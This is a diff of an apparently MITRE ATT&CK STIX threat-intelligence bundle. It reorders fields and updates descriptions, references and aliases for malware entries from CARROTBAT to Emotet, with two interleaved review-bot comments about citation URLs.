+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "S0462",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0462"
+ },
+ {
+ "source_name": "Unit 42 CARROTBAT November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/",
+ "description": "Grunzweig, J. and Wilhoit, K. (2018, November 29). The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia. Retrieved June 2, 2020."
+ },
+ {
+ "source_name": "Unit 42 CARROTBAT January 2020",
+ "url": "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/",
+ "description": "McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020."
+ }
+ ],
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-15T15:13:27.660Z",
+ "created": "2020-06-02T14:11:40.581Z",
"x_mitre_platforms": [
"Windows"
- ]
+ ],
+ "x_mitre_aliases": [
+ "CARROTBAT"
+ ],
+ "x_mitre_version": "1.0"
},
{
"id": "malware--b0f13390-cec7-4814-b37c-ccec01887faa",
@@ -191406,15 +220087,21 @@
],
"modified": "2020-03-20T20:01:55.457Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"CCBkdr"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.2"
},
{
+ "created": "2017-05-31T21:32:19.389Z",
+ "modified": "2020-03-30T15:21:18.086Z",
+ "labels": [
+ "malware"
+ ],
+ "type": "malware",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -191478,19 +220165,7 @@
"name": "CHOPSTICK",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"id": "malware--ccd61dfc-b03f-4689-8c18-7c97eab08472",
- "type": "malware",
- "labels": [
- "malware"
- ],
- "modified": "2020-03-30T15:21:18.086Z",
- "created": "2017-05-31T21:32:19.389Z",
- "x_mitre_contributors": [
- "Richard Gold, Digital Shadows"
- ],
- "x_mitre_platforms": [
- "Windows",
- "Linux"
- ],
+ "x_mitre_version": "2.1",
"x_mitre_aliases": [
"CHOPSTICK",
"Backdoor.SofacyX",
@@ -191499,7 +220174,13 @@
"X-Agent",
"webhp"
],
- "x_mitre_version": "2.1"
+ "x_mitre_platforms": [
+ "Windows",
+ "Linux"
+ ],
+ "x_mitre_contributors": [
+ "Richard Gold, Digital Shadows"
+ ]
},
{
"object_marking_refs": [
@@ -191531,13 +220212,13 @@
],
"modified": "2020-03-30T15:13:24.829Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"CORALDECK"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--60c18d06-7b91-4742-bae3-647845cd9d81",
@@ -191587,15 +220268,49 @@
],
"modified": "2020-03-30T15:14:36.623Z",
"created": "2017-05-31T21:33:18.506Z",
- "x_mitre_version": "2.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"CORESHELL",
"Sofacy",
"SOURFACE"
],
+ "x_mitre_version": "2.1"
+ },
+ {
+ "created": "2020-05-22T20:07:15.628Z",
+ "modified": "2020-05-29T13:13:22.064Z",
+ "labels": [
+ "malware"
+ ],
+ "type": "malware",
+ "id": "malware--a705b085-1eae-455e-8f4d-842483d814eb",
+ "description": "[Cadelspy](https://attack.mitre.org/software/S0454) is a backdoor that has been used by [APT39](https://attack.mitre.org/groups/G0087).(Citation: Symantec Chafer Dec 2015)",
+ "name": "Cadelspy",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "S0454",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0454"
+ },
+ {
+ "description": "Symantec Security Response. (2015, December 7). Iran-based attackers use back door threats to spy on Middle Eastern targets. Retrieved April 17, 2019.",
+ "url": "https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets",
+ "source_name": "Symantec Chafer Dec 2015"
+ }
+ ],
"x_mitre_platforms": [
"Windows"
- ]
+ ],
+ "x_mitre_aliases": [
+ "Cadelspy"
+ ],
+ "x_mitre_version": "1.0"
},
{
"id": "malware--b8fdef82-d2cf-4948-8949-6466357b1be1",
@@ -191632,16 +220347,16 @@
],
"modified": "2020-03-30T01:58:55.849Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "Calisto"
+ "x_mitre_platforms": [
+ "macOS"
],
"x_mitre_contributors": [
"Cody Thomas, SpecterOps"
],
- "x_mitre_platforms": [
- "macOS"
- ]
+ "x_mitre_aliases": [
+ "Calisto"
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "malware--cb7bcf6f-085f-41db-81ee-4b68481661b5",
@@ -191669,13 +220384,13 @@
],
"modified": "2020-03-30T15:16:18.880Z",
"created": "2017-05-31T21:32:52.875Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "macOS"
+ ],
"x_mitre_aliases": [
"CallMe"
],
- "x_mitre_platforms": [
- "macOS"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -191712,13 +220427,13 @@
],
"modified": "2020-03-30T15:17:24.834Z",
"created": "2019-01-30T18:58:03.614Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Cannon"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--72f54d66-675d-4587-9bd3-4ed09f9522e4",
@@ -191764,14 +220479,14 @@
],
"modified": "2020-03-30T18:46:57.986Z",
"created": "2017-05-31T21:32:22.213Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Carbanak",
"Anunak"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -191808,13 +220523,13 @@
],
"modified": "2020-03-28T21:32:10.278Z",
"created": "2019-01-29T19:36:02.103Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Carbon"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--b879758f-bbc4-4cab-b5ba-177ac9b009b4",
@@ -191846,13 +220561,13 @@
],
"modified": "2020-03-30T01:59:34.624Z",
"created": "2019-01-30T16:39:53.573Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Cardinal RAT"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--8d9e758b-735f-4cbc-ba7c-32cd15138b2a",
@@ -191884,13 +220599,13 @@
],
"modified": "2020-03-17T23:40:44.651Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Catchamas"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--dc5d1a33-62aa-4a0c-aa8c-589b87beb11e",
@@ -191950,15 +220665,15 @@
],
"modified": "2020-03-30T18:49:40.093Z",
"created": "2017-05-31T21:33:22.451Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"ChChes",
"Scorpion",
"HAYMAKER"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"object_marking_refs": [
@@ -191988,15 +220703,15 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T15:19:17.909Z",
+ "modified": "2020-07-01T18:30:55.286Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_platforms": [
- "Linux"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Chaos"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Linux"
+ ]
},
{
"id": "malware--b2203c59-4089-4ee4-bfe1-28fa25f0dbfe",
@@ -192024,13 +220739,13 @@
],
"modified": "2020-03-30T15:20:05.298Z",
"created": "2017-05-31T21:33:05.710Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Cherry Picker"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"object_marking_refs": [
@@ -192072,13 +220787,13 @@
],
"modified": "2020-03-30T15:20:49.892Z",
"created": "2017-05-31T21:32:18.315Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "2.1",
"x_mitre_aliases": [
"China Chopper"
],
- "x_mitre_version": "2.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--cbf646f1-7db5-4dc6-808b-0094313949df",
@@ -192111,15 +220826,15 @@
],
"modified": "2020-03-30T15:21:58.231Z",
"created": "2017-05-31T21:32:38.128Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"CloudDuke",
"MiniDionis",
"CloudLook"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -192151,13 +220866,13 @@
],
"modified": "2020-03-30T15:22:42.218Z",
"created": "2019-01-29T21:40:37.350Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Cobian RAT"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--d1531eaa-9e17-473e-a680-3298469662c3",
@@ -192185,22 +220900,21 @@
],
"modified": "2020-03-30T15:23:53.711Z",
"created": "2019-04-23T18:41:36.914Z",
- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "CoinTicker"
+ "x_mitre_contributors": [
+ "Richie Cyrus, SpecterOps"
],
"x_mitre_platforms": [
"macOS"
],
- "x_mitre_contributors": [
- "Richie Cyrus, SpecterOps"
- ]
+ "x_mitre_aliases": [
+ "CoinTicker"
+ ],
+ "x_mitre_version": "1.1"
},
{
- "id": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "ComRAT",
- "description": "[ComRAT](https://attack.mitre.org/software/S0126) is a remote access tool suspected of being a decedent of [Agent.btz](https://attack.mitre.org/software/S0092) and used by [Turla](https://attack.mitre.org/groups/G0010). (Citation: Symantec Waterbug) (Citation: NorthSec 2015 GData Uroburos Tools)",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -192210,23 +220924,32 @@
{
"source_name": "Symantec Waterbug",
"description": "Symantec. (2015, January 26). The Waterbug attack group. Retrieved April 10, 2015.",
- "url": "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf"
+ "url": "https://www.threatminer.org/report.php?q=waterbug-attack-group.pdf&y=2015#gsc.tab=0&gsc.q=waterbug-attack-group.pdf&gsc.page=1"
},
{
"source_name": "NorthSec 2015 GData Uroburos Tools",
"description": "Rascagneres, P. (2015, May). Tools used by the Uroburos actors. Retrieved August 18, 2016.",
- "url": "https://www.nsec.io/wp-content/uploads/2015/05/uroburos-actors-tools-1.1.pdf"
+ "url": "https://docplayer.net/101655589-Tools-used-by-the-uroburos-actors.html"
+ },
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
+ "description": "[ComRAT](https://attack.mitre.org/software/S0126) is a second stage implant suspected of being a descendant of [Agent.btz](https://attack.mitre.org/software/S0092) and used by [Turla](https://attack.mitre.org/groups/G0010). The first version of [ComRAT](https://attack.mitre.org/software/S0126) was identified in 2007, but the tool has undergone substantial development for many years since.(Citation: Symantec Waterbug)(Citation: NorthSec 2015 GData Uroburos Tools)(Citation: ESET ComRAT May 2020)",
+ "name": "ComRAT",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "id": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
"type": "malware",
"labels": [
"malware"
],
- "modified": "2020-03-30T15:24:36.056Z",
+ "modified": "2020-07-06T14:40:26.004Z",
"created": "2017-05-31T21:33:13.252Z",
+ "x_mitre_contributors": [
+ "Matthieu Faou, ESET"
+ ],
"x_mitre_version": "1.1",
"x_mitre_aliases": [
"ComRAT"
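Review bot: The two rewritten `"url"` values swap the original publisher locations (symantec.com and nsec.io) for third-party re-hosts (threatminer.org and docplayer.net), which weakens the provenance of the citations backing the `"description"` claims — a re-host can silently differ from or outlive the primary document, and the reference no longer identifies who published it. Prefer an archived snapshot of the original publisher URL, or keep the original URL and add the mirror as a separate entry, so the citation stays verifiable against its source. The ComRAT object continues past the end of this hunk (the `x_mitre_aliases` array is still open at the last line).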
@@ -192265,13 +220988,13 @@
],
"modified": "2020-03-30T15:25:11.871Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Comnie"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--2eb9b131-d333-4a48-9eb4-d8dec46c19ee",
@@ -192299,16 +221022,16 @@
],
"modified": "2020-03-28T21:32:37.171Z",
"created": "2017-05-31T21:32:36.550Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"CosmicDuke",
"TinyBaron",
"BotgenStudios",
"NemesisGemina"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--e6ef745b-077f-42e1-a37d-29eecff9c754",
@@ -192336,7 +221059,9 @@
],
"modified": "2020-03-28T21:32:59.528Z",
"created": "2017-05-31T21:32:35.022Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"CozyCar",
"CozyDuke",
@@ -192344,9 +221069,7 @@
"Cozer",
"EuroAPT"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.2"
},
{
"id": "malware--326af1cd-78e7-45b7-a326-125d2f7ef8f2",
@@ -192374,14 +221097,14 @@
],
"modified": "2020-03-30T15:25:59.334Z",
"created": "2017-05-31T21:33:08.679Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Crimson",
"MSIL/Crimson"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--a5e91d50-24fa-44ec-9894-39a88f658cea",
@@ -192413,15 +221136,15 @@
],
"modified": "2020-03-30T15:26:42.369Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "CrossRAT"
- ],
"x_mitre_platforms": [
"Linux",
"Windows",
"macOS"
- ]
+ ],
+ "x_mitre_aliases": [
+ "CrossRAT"
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "malware--d186c1d6-e3ac-4c3d-a534-9ddfeb8c57bb",
@@ -192491,13 +221214,13 @@
],
"modified": "2020-03-30T15:27:25.149Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"DOGCALL"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.2"
},
{
"id": "malware--53ab35c2-d00e-491a-8753-41d35ae7e547",
@@ -192550,7 +221273,9 @@
],
"modified": "2020-03-28T00:53:12.228Z",
"created": "2019-01-29T19:18:28.468Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"DarkComet",
"DarkKomet",
@@ -192558,9 +221283,7 @@
"Krademok",
"FYNLOS"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--310f437b-29e7-4844-848c-7220868d074a",
@@ -192623,15 +221346,15 @@
],
"modified": "2020-03-30T02:04:21.751Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Daserf",
"Muirim",
"Nioupale"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--8f460983-1bbb-4e7e-8094-f0b5e720f658",
@@ -192663,18 +221386,18 @@
],
"modified": "2020-03-30T15:28:13.547Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"DealersChoice"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--f25aab1a-0cef-4910-a85d-bb38b32ea41a",
"name": "Denis",
- "description": "[Denis](https://attack.mitre.org/software/S0354) is a Windows backdoor and Trojan.(Citation: Cybereason Oceanlotus May 2017)",
+ "description": "[Denis](https://attack.mitre.org/software/S0354) is a Windows backdoor and Trojan used by [APT32](https://attack.mitre.org/groups/G0050). [Denis](https://attack.mitre.org/software/S0354) shares several similarities to the [SOUNDBITE](https://attack.mitre.org/software/S0157) backdoor and has been used in conjunction with the [Goopy](https://attack.mitre.org/software/S0477) backdoor.(Citation: Cybereason Oceanlotus May 2017)",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
@@ -192699,15 +221422,15 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T15:28:57.476Z",
+ "modified": "2020-06-30T15:06:42.569Z",
"created": "2019-01-30T20:01:44.815Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Denis"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--94379dec-5c87-49db-b36e-66abc0b81344",
@@ -192758,15 +221481,15 @@
],
"modified": "2020-03-30T18:59:10.146Z",
"created": "2017-05-31T21:32:18.668Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows",
+ "Linux"
+ ],
"x_mitre_aliases": [
"Derusbi",
"PHOTO"
],
- "x_mitre_platforms": [
- "Windows",
- "Linux"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--e170995d-4f61-4f17-b60e-04f9a06ee517",
@@ -192798,16 +221521,16 @@
],
"modified": "2020-03-30T15:30:14.126Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "Dipsind"
+ "x_mitre_platforms": [
+ "Windows"
],
"x_mitre_contributors": [
"Ryan Becwar"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_aliases": [
+ "Dipsind"
+ ],
+ "x_mitre_version": "1.1"
},
{
"object_marking_refs": [
@@ -192843,14 +221566,14 @@
],
"modified": "2020-03-19T19:08:28.695Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_platforms": [
- "macOS"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Dok",
"Retefe"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "macOS"
+ ]
},
{
"id": "malware--e48df773-7c95-4a4c-ba70-ea3d15900148",
@@ -192882,13 +221605,13 @@
],
"modified": "2020-03-30T15:31:30.330Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"DownPaper"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--08d20cd2-f084-45ee-8558-fa6ef5a18519",
@@ -192916,14 +221639,14 @@
],
"modified": "2020-03-30T15:32:15.795Z",
"created": "2017-05-31T21:33:16.790Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Downdelph",
"Delphacy"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.2"
},
{
"external_references": [
@@ -192960,16 +221683,22 @@
],
"modified": "2020-03-30T16:20:01.787Z",
"created": "2019-05-30T19:47:37.192Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Dridex",
"Bugat v5"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
+ "created": "2017-05-31T21:32:31.188Z",
+ "modified": "2020-03-30T02:07:19.052Z",
+ "labels": [
+ "malware"
+ ],
+ "type": "malware",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -192989,25 +221718,19 @@
"name": "Duqu",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"id": "malware--68dca94f-c11d-421e-9287-7c501108e18c",
- "type": "malware",
- "labels": [
- "malware"
- ],
- "modified": "2020-03-30T02:07:19.052Z",
- "created": "2017-05-31T21:32:31.188Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.2",
"x_mitre_aliases": [
"Duqu"
],
- "x_mitre_version": "1.2"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "DustySky",
- "description": "[DustySky](https://attack.mitre.org/software/S0062) is multi-stage malware written in .NET that has been used by [Molerats](https://attack.mitre.org/groups/G0021) since May 2015. (Citation: DustySky) (Citation: DustySky2)",
+ "description": "[DustySky](https://attack.mitre.org/software/S0062) is multi-stage malware written in .NET that has been used by [Molerats](https://attack.mitre.org/groups/G0021) since May 2015. (Citation: DustySky) (Citation: DustySky2)(Citation: Kaspersky MoleRATs April 2019)",
"external_references": [
{
"external_id": "S0062",
@@ -193015,14 +221738,18 @@
"source_name": "mitre-attack"
},
{
- "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.",
"source_name": "DustySky",
- "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf"
+ "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016."
},
{
"url": "http://www.clearskysec.com/wp-content/uploads/2016/06/Operation-DustySky2_-6.2016_TLP_White.pdf",
"description": "ClearSky Cybersecurity. (2016, June 9). Operation DustySky - Part 2. Retrieved August 3, 2016.",
"source_name": "DustySky2"
+ },
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
}
],
"object_marking_refs": [
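Review bot: The DustySky external reference loses its `url` on the new side — the removed line `"url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf"` is never re-added, while the sibling DustySky2 and Kaspersky entries in the same hunk keep theirs. An entry with only `source_name` and a free-text `description` can no longer be resolved by tooling that follows `external_references[].url`, and since the surrounding change is a key reorder this reads as an accidental drop rather than a deliberate link retirement. If the ClearSky link is known to be dead, keeping the original URL (or an archived copy) still lets a reader locate the report; otherwise restore the line alongside the reordered `description`.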
@@ -193032,22 +221759,22 @@
"labels": [
"malware"
],
- "modified": "2020-03-23T22:01:45.880Z",
+ "modified": "2020-05-14T15:14:33.332Z",
"created": "2017-05-31T21:32:41.750Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"DustySky",
"NeD Worm"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--63c2a130-8a5b-452f-ad96-07cf0af12ffe",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Dyre",
- "description": "[Dyre](https://attack.mitre.org/software/S0024) is a Trojan that has been used for financial gain. \n (Citation: Symantec Dyre June 2015)",
+ "description": "[Dyre](https://attack.mitre.org/software/S0024) is a banking Trojan that has been used for financial gain. \n (Citation: Symantec Dyre June 2015)(Citation: Malwarebytes Dyreza November 2015)",
"external_references": [
{
"source_name": "mitre-attack",
@@ -193058,10 +221785,28 @@
"source_name": "Dyre",
"description": "(Citation: Symantec Dyre June 2015)"
},
+ {
+ "source_name": "Dyzap",
+ "description": "(Citation: Sophos Dyreza April 2015)"
+ },
+ {
+ "source_name": "Dyreza",
+ "description": "(Citation: Sophos Dyreza April 2015)"
+ },
{
"source_name": "Symantec Dyre June 2015",
"description": "Symantec Security Response. (2015, June 23). Dyre: Emerging threat on financial fraud landscape. Retrieved August 23, 2018.",
"url": "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dyre-emerging-threat.pdf"
+ },
+ {
+ "source_name": "Malwarebytes Dyreza November 2015",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/",
+ "description": "hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020."
+ },
+ {
+ "source_name": "Sophos Dyreza April 2015",
+ "url": "https://nakedsecurity.sophos.com/2015/04/20/notes-from-sophoslabs-dyreza-the-malware-that-discriminates-against-old-computers/",
+ "description": "Ducklin, P. (2015, April 20). Notes from SophosLabs: Dyreza, the malware that discriminates against old computers. Retrieved June 16, 2020."
}
],
"object_marking_refs": [
@@ -193071,15 +221816,20 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T16:20:52.891Z",
+ "modified": "2020-06-22T17:59:13.241Z",
"created": "2017-05-31T21:32:19.746Z",
- "x_mitre_version": "1.2",
- "x_mitre_aliases": [
- "Dyre"
+ "x_mitre_contributors": [
+ "Josh Campbell, Cyborg Security, @cyb0rgsecur1ty"
],
"x_mitre_platforms": [
"Windows"
- ]
+ ],
+ "x_mitre_aliases": [
+ "Dyre",
+ "Dyzap",
+ "Dyreza"
+ ],
+ "x_mitre_version": "1.2"
},
{
"id": "malware--3cab1b76-2f40-4cd0-8d2c-7ed16eeb909c",
@@ -193107,13 +221857,13 @@
],
"modified": "2020-03-30T16:21:32.420Z",
"created": "2017-05-31T21:32:43.237Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"ELMER"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--d6b3fcd0-1c86-4350-96f0-965ed02fcc51",
@@ -193150,15 +221900,15 @@
],
"modified": "2020-03-28T00:54:00.807Z",
"created": "2019-04-19T16:40:24.922Z",
- "x_mitre_contributors": [
- "Marc-Etienne M.L\u00e9veill\u00e9, ESET"
+ "x_mitre_platforms": [
+ "Linux"
],
- "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Ebury"
],
- "x_mitre_platforms": [
- "Linux"
+ "x_mitre_version": "1.1",
+ "x_mitre_contributors": [
+ "Marc-Etienne M.L\u00e9veill\u00e9, ESET"
]
},
{
@@ -193204,15 +221954,15 @@
],
"modified": "2020-03-20T23:20:16.933Z",
"created": "2017-05-31T21:32:54.416Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.2",
"x_mitre_aliases": [
"Elise",
"BKDR_ESILE",
"Page"
],
- "x_mitre_version": "1.2"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--0f862b01-99da-47cc-9bdb-db4a86a95bb1",
@@ -193244,13 +221994,13 @@
],
"modified": "2020-03-20T17:06:41.399Z",
"created": "2017-05-31T21:32:54.772Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Emissary"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -193344,18 +222094,18 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T19:29:55.998Z",
+ "modified": "2020-07-15T13:03:45.812Z",
"created": "2019-03-25T18:35:14.353Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_contributors": [
+ "Omkar Gudhate"
],
+ "x_mitre_version": "1.2",
"x_mitre_aliases": [
"Emotet",
"Geodo"
